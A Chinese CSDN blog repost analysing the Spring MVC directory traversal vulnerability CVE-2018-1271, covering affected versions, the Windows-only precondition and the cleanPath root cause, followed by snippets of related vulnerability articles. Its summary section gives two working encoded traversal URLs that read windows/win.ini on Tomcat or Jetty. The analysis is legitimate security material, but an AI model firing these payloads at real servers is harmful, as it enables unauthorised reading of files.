php目录穿越漏洞,Spring MVC 目录穿越漏洞(CVE-2018-1271)分析

最新推荐文章于 2024-01-14 12:00:00 发布
最新推荐文章于 2024-01-14 12:00:00 发布
阅读量412 收藏
点赞数
文章标签: php目录穿越漏洞
该博客讨论了Spring Framework 5.0至5.0.4及4.3至4.3.14版本中的一个安全漏洞,影响Windows系统。攻击者可以利用file协议和特定的编码方式来访问敏感资源。在5.0.1以上的版本中,某些payload在Tomcat下无法触发,但在Jetty下仍能生效。建议升级到不受影响的版本以防止路径遍历攻击。
摘要由CSDN通过智能技术生成

原文出自:https://paper.seebug.org/665/

漏洞影响

Spring Framework 5.0 to 5.0.4.

Spring Framework 4.3 to 4.3.14

已不支持的旧版本仍然受影响

漏洞利用条件

Server运行于Windows系统上

要使用file协议打开资源文件目录

cleanPath的问题在于String[] pathArray = delimitedListToStringArray(pathToUse, "/");

这个是允许空元素存在的,也就是说cleanPath会把//当成一个目录,而操作系统是不会把//当成一个目录的。借用一张Orange大佬的图。

28f74123787a577badb8a0e3b2d3f627.png

详细分析本文不做记录

注意事项

1、在Spring Framework 大于5.0.1的版本,双编码payload在tomcat、jetty下触发不了,

但是单编码payload可以在jetty下触发,tomcat下失败(因为在默认情况下Tomcat遇到包含%2f(/)、%5c(\)的URL直接http 400)

总结

Spring Framework <=5.0.1

tomcat、jetty:(双编码)

/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini

Spring Framework >5.0.1

jetty:(单编码)

/resources/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini

weixin_39622901
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
android路径穿越漏洞,Spring MVC 目录穿越漏洞(CVE-2018-1271)分析
weixin_29349409的博客
06-03 494
作者: Badcode@知道创宇404实验室漏洞简介2018年04月05日,Pivotal公布了Spring MVC存在一个目录穿越漏洞(CVE-2018-1271)。Spring Framework版本5.0到5.0.4,4.3到4.3.14以及较旧的不受支持的版本允许应用程序配置Spring MVC以提供静态资源(例如CSS,JS,图像)。当Spring MVC的静态资源存放在Windows系...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
Spring MVC 目录穿越漏洞(CVE-2018-1271)
小小猪的博客
10-27 1299
Spring MVC 目录穿越漏洞(CVE-2018-1271) 漏洞简介: 2018年04月05日,Pivotal公布了Spring MVC存在一个目录穿越漏洞(CVE-2018-1271)。Spring Framework版本5.0到5.0.4,4.3到4.3.14以及较旧的不受支持的版本允许应用程序配置Spring MVC以提供静态资源(例如CSS,JS,图像)。当Spring MVC的静态资源存放在Windows系统上时,攻击可以通过构造特殊URL导致目录遍历漏洞漏洞影响: Serv
php目录穿越漏洞攻击,WinRAR目录穿越漏洞
weixin_42522400的博客
03-24 398
漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行漏洞编号:CVE-2018-20250影响版本:WinRAR < 5.70 Beta 1Bandi...
php目录穿越漏洞攻击,ImpressCMS跨站脚本执行和本地文件包含漏洞
weixin_42619448的博客
03-24 264
发布日期:2012-10-08更新日期:2012-10-09受影响系统:ImpressCMS ImpressCMS 1.3 Final描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51268CVE ID: CVE-2012-0987ImpressCMS是...
php目录穿越漏洞攻击,GitLab任意文件读取漏洞CVE-2020-10977
weixin_35652131的博客
03-24 298
2020年4月28日,GitLab的一个任意文件读取漏洞漏洞细节被公开。该漏洞补丁于2020年3月26号由GitLab官方发布。相关组件介绍GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。漏洞分析当GitLab...
基于CVE-2018-20250的漏洞分析(pdf+视频).zip
02-14
该团队经过深入研究检测相继发现了WinRAR的四个安全漏洞,分别为ACE文件验证逻辑绕过漏洞CVE-2018-20250)、ACE文件名逻辑验证绕过漏洞CVE-2018-20251)、ACE/RAR文件越界写入漏洞CVE-2018-20252)以及LHA/LZH...
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
**远程执行代码漏洞(CVE-2018-0886)详解及修复** 远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
php目录穿越漏洞复现,ElasticSearch漏洞复现集合
weixin_34945060的博客
03-28 670
原理ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项...
php目录穿越漏洞复现,关于Drupal目录穿越漏洞风险提示
weixin_39716105的博客
03-28 172
原标题:关于Drupal目录穿越漏洞风险提示漏洞简述时间:2021年01月22日程序详情:Drupal 是使用 PHP 语言编写的开源内容管理框架( CMF ),它由内容管理系统( CMS )和 PHP 开发框架( Framework )共同构成。pear,composer是 php 的插件管理/包管理系统,目前composer更为通用和流行。信息来源:01风险等级威胁等级:高影响范围:广泛02漏...
Spring Cloud Config目录遍历漏洞CVE-2019-3799)预警
systemino的博客
04-22 2342
近日,Spring官方团队在最新的安全更新中披露了一则Spring Cloud Config目录遍历漏洞CVE-2019-3799)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件,攻击者可以构造恶意URL实现目录遍历漏洞的利用。 Spring产品介绍 Spring是一个Java/Java EE/....
spring漏洞
HappyProgrammer的博客
04-06 4175
触发条件 1. 在JDK 9或更高版本上运行 2.Apache Tomcat作为Servlet容器。 3. 打包为war,并部署在独立的Tomcat实例中。使用嵌入式Servlet容器或反应式web服务器的典型Spring Boot部署不受影响。 4. spring webmvcspring webflux依赖项。 5. Spring框架版本5.3.0至5.3.17、5.2.0至5.2.19以及更早的版本。 修复方式: 1. @ControllerAdvice @Order(Ordere
PHP代码审计 ----- 目录穿越
qq_62344745的博客
04-19 336
目录穿越(Directory Traversal)攻击是黑客能够在Web应用程序所在的根目录以外的文件夹上,任意地存取被限制的文件夹执行命令或查找数据。目录穿越攻击,也有人称为Path Traversal攻击。
php目录遍历漏洞复现,nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现...
weixin_42176612的博客
03-20 275
nginx解析漏洞,配置不当,目录遍历漏洞复现1.Ubuntu14.04安装nginx-php5-fpm安装了nginx,需要安装以下依赖sudo apt-get install libpcre3 libpcre3-devsudo apt-get install zlib1g.devsudo apt-get install libssl-dev安装php:apt-get install php5-...
spring常见漏洞(1)
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-14 485
Spring Security OAuth RCE(cve-2016-4977),是为Spring框架提供安全认证支持的一个模块,在7月5日其维护者发布了这样一个升级公告,主要说明在用户使用来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。漏洞的发现者在10月13日公开了该漏洞的挖掘记录。
spring常见漏洞(前言)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-13 623
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式:Spring = 春天 = Java程序员的春天 = 简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003 年兴起的一个轻量级的Java 开发框架。由Rod Johnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。
spring常见漏洞总结
hongduilanjun的博客
07-21 4939
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式Spring=春天=Java程序员的春天=简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003年兴起的一个轻量级的Java开发框架。由RodJohnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。...
Spring MVC框架CVE-2010-1622漏洞分析与拒绝服务可能性
"Spring框架(CVE-2010-1622)漏洞利用指南" 这篇文章探讨的是2010年出现的一个针对Spring框架的安全漏洞CVE标识符为CVE-2010-1622。该漏洞主要涉及Spring MVC,这是一个广泛使用的Java应用程序开发框架,特别适用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值